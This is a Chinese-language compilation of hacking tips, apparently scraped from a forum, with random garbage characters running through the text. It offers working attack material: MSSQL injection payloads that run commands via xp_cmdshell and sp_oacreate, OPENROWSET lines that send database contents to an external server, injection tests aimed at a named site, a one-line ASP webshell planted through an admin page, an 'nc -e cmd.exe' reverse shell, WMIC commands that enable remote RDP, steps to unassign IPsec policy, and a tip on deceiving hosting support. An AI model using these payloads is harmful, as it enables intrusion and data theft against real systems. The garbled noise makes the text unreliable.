SA点数据库分离技术相关
; O$ a2 c# W i+ G8 e ~
9 q$ D/ z% t! W5 [' }6 k! j
3 g7 J% ]+ m+ I# iSA点数据库分离搞法+语句:- M1 G7 Y3 M7 i
1 g8 h- U) a/ E& p, V/ d
注射点不显错,执行下面三条语句页面都返回正常。
: y% A! b6 ]4 U8 }9 O+ Y9 q' J6 Land 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread'): C4 U4 U O2 z* p$ P
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
L$ G3 t N/ m2 fand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')* }* u; n6 p! i u# M4 K
可以列目录,判断系统为2000,web与数据库分离) l8 j1 N! c" p8 P" J/ y# J% [
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
/ E6 Z# C! o) [9 [3 L+ I' ?在注射点上执行4 f3 b+ Q0 }! e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--: T% R0 t" Q1 d) y) a/ d
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
: n1 }8 e! j8 ^+ s7 N$ L0 _还有我用NC监听得其他端口都没有得到IP。
" j. }/ q4 D: F5 m; B* N- } ^' ?- z* `$ M% I
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
* B7 l4 r2 b3 t8 _'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--2 S5 r- z! }1 ]0 F! K
5 N. j3 s8 m! M# l, G! z0 S
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
0 u+ o. ` z1 R( ]& v. B1 Z- Q' a' j* a3 ^+ ~/ J( a
现在就猜想是不是数据库是内网而且不能连外网。
3 {. {3 ]/ @0 M4 _# h! J! i( G& h! G
5 K$ z# Y4 D6 m6 z2 e3 naccess导出txt文本代码8 ^. w7 X3 ~$ V1 p$ L" T
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin( e3 h4 @2 h6 N, v! v
: w: O! }& A3 V# a
$ ^% C E& z1 v2 o" g; Y L
' n- Q5 R/ Z1 q# _) u+ G
自动跳转到指定网站代码头
: t- f& Q) |; ~, T9 q. s<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
4 ^) L" |8 u6 @; E8 Z1 ]: H6 g8 m; W: O. Q, g+ v8 Y7 Q% N
2 I% s! A/ n+ g9 ^0 ^5 q
入侵java or jsp站点时默认配置文件路径:
2 h) {' N* ~4 k/ Q- Z\web-inf\web.xml1 ?; |. S$ u2 j( Q- ^+ i4 P$ S+ Z2 p
tomcat下的配置文件位置:
; H$ y" a. x; e. y& D/ M6 h\conf\server.xml (前面加上tomcat路径)
1 O5 ^) ]. {2 {+ N4 k" | j\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
d* P6 e. A! t# ]
7 ~+ |- Z2 D; L* G1 i, r; S1 T6 Z1 G6 l
" {! \4 h) N+ x: x3 ]; F3 S
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:/ I+ s4 f. m; k
-1%237 A& m) G3 {! p1 t4 V; M# F
> * U7 t9 ~1 S% ^! q4 d3 h
<
' \" r" E9 f- g4 K2 {9 u; N' B' _1'+or+'1'='14 Y- l* e' l3 u, l+ ~
id=8%bf
( r5 t1 z/ W$ d" W5 I, ]
' a0 t- A/ L3 h$ N/ h! ?全新注入点检测试法:1 J& h: D6 D' h" V
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
! t; N3 v0 V! }' @0 `
+ g/ P! Q, V* o% M% W在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
, T# `8 y: P7 x: B# u( T9 x& q w8 U& \
搜索型注入判断方法: H- c$ w( t1 e( i2 g
北京%' and '1'='1' and '%'='! Q5 W" u% S2 ^
北京%' and '1'='2' and '%'='. o0 A# E; j3 q8 B, C
0 }/ \0 ?& K w# a9 q: A: |
8 a; ^4 D' x6 l
COOKIES注入:) g3 {$ D2 O$ Y6 B! c& I
0 F7 o V$ A2 w; T# i( D% l
javascript:alert(document.cookie="id="+escape("51 and 1=1"));7 p, C8 U8 o' M n5 R
- ]7 _" y. n4 o, [% `2000专业版查看本地登录用户命令:6 E9 O' } [5 c2 D) r/ T1 j
net config workstation
9 \1 D, a0 U: B3 j# | ^0 o
+ s7 Z$ I, p. d' T+ C7 o# m
% m X& U! }" J8 m# {7 R$ G& A+ u2003下查看ipsec配置和默认防火墙配置命令:# U) h, B1 S5 r. C2 j
netsh firewall show config
: T1 u/ ^+ ^2 R) ?2 C; d5 o A8 cnetsh ipsec static show all
# }+ T; u- s7 d# A2 U' m- n6 H7 Q2 w& |
不指派指定策略命令:
2 J: X- T7 F5 U4 V4 bnetsh ipsec static set policy name=test assign=n (test是不指派的策略名); _# V5 |& l8 Q w8 p
netsh ipsec static show policy all 显示策略名1 U A. e$ U' w0 M; c5 l' F2 a1 R) o6 Y
, |# `; N3 r. k: I* h
" E' a, S( F9 Q& H; X0 \
猜管理员后台小技巧:, P2 [+ t2 O6 y0 G' l/ Z# e
admin/left.asp
3 P* |. t# b5 r3 s' A! Gadmin/main.asp
! g" R1 Q$ w* C wadmin/top.asp. s6 R, P# V- q7 O
admin/admin.asp
/ Q }( P' E& _' J会现出菜单导航,然后迅雷下载全部链接4 p5 |' n7 y$ _' f2 j
+ e$ ~5 M; o& y; g! c2 W7 b8 W
, h9 O8 R- ^0 j& d6 l社会工程学:
j( W, v$ _/ Q5 H9 M用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
1 d! C$ U+ Z) t/ j* p然后去骗客服6 _" v2 z, l- k- t A
" z* f- b' e, ?3 U2 I* C9 M
1 y$ I; q. m, o3 F( n统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
+ I8 t. Q! C8 Z3 P/ H查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 4 J9 X2 m+ I# N6 |; P4 L
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
, X4 y& ?9 I, I$ r( F+ q+ x9 y3 j7 H9 M4 b
4 R7 C! Y% j& |/ P% g
% j$ z6 I a' A0 U5 O
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)4 X: X/ M j4 v9 T* Q
( ]* q h6 @" l; I% A5 s" S
( w' F2 |) k, P8 L5 ^2 C g% K8 ]% K1 v6 f- B
CMD加密注册表位置
' p& q8 A6 s% K+ g' o4 J$ b- F(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor4 r9 Y; v; {% D" ~% _2 {2 n
AutoRun
% t2 F! {, m, Y$ J- T$ ]7 t0 b% d! f) c% G; n" B7 S( D; U7 I& T
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor. c/ c* ^: f) ~/ j0 {
AutoRun) X' M& T6 c& d4 Z4 R
+ _2 I4 R% c4 m7 f( [. s6 i8 y4 T7 _/ g' Q0 B, g ^
在找注入时搜索Hidden,把他改成test- g* e) y f$ P$ [5 b
! B" ]; T o5 V( t7 Q- J# P0 Q
* W X* L; _" }
s5 }/ M; h8 O+ }
mstsc /v:IP /console
" E: z- a" p, O6 Y# r- r, _& C" T& a8 c% u& O3 i6 f. J$ v( q% j, x
/ j3 G: x' p; \# i" b! g一句话开3389:* L& A% Z. g4 |5 T- ]
4 c- O8 `) h" z最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
( l/ d) J* }% ~9 I' v开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
! V& I7 W9 h N2 P2 I+ U N S
# Z s# m! |) X/ M* C& X, _, Q+ R0 i$ W4 @
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:# u7 h4 y) C) E: z
Insert into admin(user,pwd) values('test','test')
1 j3 q" r, i" p8 T/ ?9 k8 ]5 j! G7 X
; o+ B5 |7 ?, ]' ~: S0 P9 {NC反弹% {( }0 l/ h3 Y% {
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
( |0 h+ S7 d; m6 s1 {) G; d- k2 w2 Z( n然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)- ^, Z1 O7 j7 l
* @) H* |/ g6 _" V7 Z$ M1 f7 Q% R4 R( m
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题2 U! r3 j7 j9 y: q$ T3 e
q" ]- A) O: `! Y7 A
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
. Q) I: @$ v7 k1 f0 _例如:
: ?. b- Y Z1 q+ g8 B; D. gsubst k: d:\www\ 用d盘www目录替代k盘1 J& y: r% @* ~) h
subst k: /d 解除K盘代替 |